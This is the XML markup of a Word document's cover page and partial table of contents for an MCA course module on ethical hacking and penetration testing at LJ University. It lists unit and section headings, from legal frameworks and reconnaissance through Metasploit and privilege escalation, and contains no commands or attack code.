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pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">L J INSTITUTE OF COMPUTER APPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LJ University</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Programme: Master of Computer Applications (MCA)  ·  Semester: III</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Academic Syllabus Batch: 2025</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="560"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t xml:space="preserve">ETHICAL HACKING &amp;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Student Study Material</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="700"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Units I – V  ·  Eight Lab Practicals  ·  Capstone VAPT Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Built strictly on the official LJ University syllabus for this course</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="700"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for educational and authorised laboratory use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">All techniques described are for use only against systems you own or are explicitly authorised to test, inside isolated lab environments (Kali Linux, Metasploitable 2, DVWA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="900"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for: Vishal Chudasama</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="1080" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Word field (auto-updates on open / via Ctrl+A then F9):</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Table of Contents"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p>
          <w:r>
            <w:fldChar w:fldCharType="begin" w:dirty="true"/>
            <w:instrText xml:space="preserve">TOC \h \o "1-3"</w:instrText>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
        </w:p>
        <w:p>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Quick Section Listing (static, always visible)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit I — Fundamentals of Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What Is Hacking? What Is Cybersecurity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Types of Hackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Ethical Hacking vs Malicious Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 How Ethical Hacking Strengthens Security, and Why Organisations Pay for It</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Legal Framework — The IT Act, 2000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.6 Written Authorisation, Rules of Engagement, NDA and Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7 The 5 Phases of Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.8 The Cyber Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 Red Team, Blue Team and Purple Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10 VAPT vs Penetration Test vs Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.11 Introduction to PTES and the OWASP Testing Guide v4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1.12 Virtual Lab Setup Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit II — Reconnaissance, Scanning &amp; Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Passive vs Active Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Google Dorking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 WHOIS Lookups</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 DNS Record Types and Querying</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Shodan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 Maltego Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8 LinkedIn OSINT and Employee Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.9 Recon-ng Framework Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.10 Active Reconnaissance — Nmap Scan Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.11 NSE Scripts and Timing Templates</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.12 Banner Grabbing with Netcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.13 Network Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.14 Reading the Scan Report and Building a Service Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.15 CVSS v3.1 Score Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.16 CVE Lookup on nvd.nist.gov</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.17 Differentiating Severity Levels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">2.18 False Positives and Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="100"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unit III — Exploitation, Metasploit &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Metasploit Framework Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 msfconsole Commands and Core Variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Payloads: Staged vs Stageless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Listener Setup and Meterpreter Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Windows Privilege Escalation Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20" w:before="0"/>
        <w:ind w:left="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
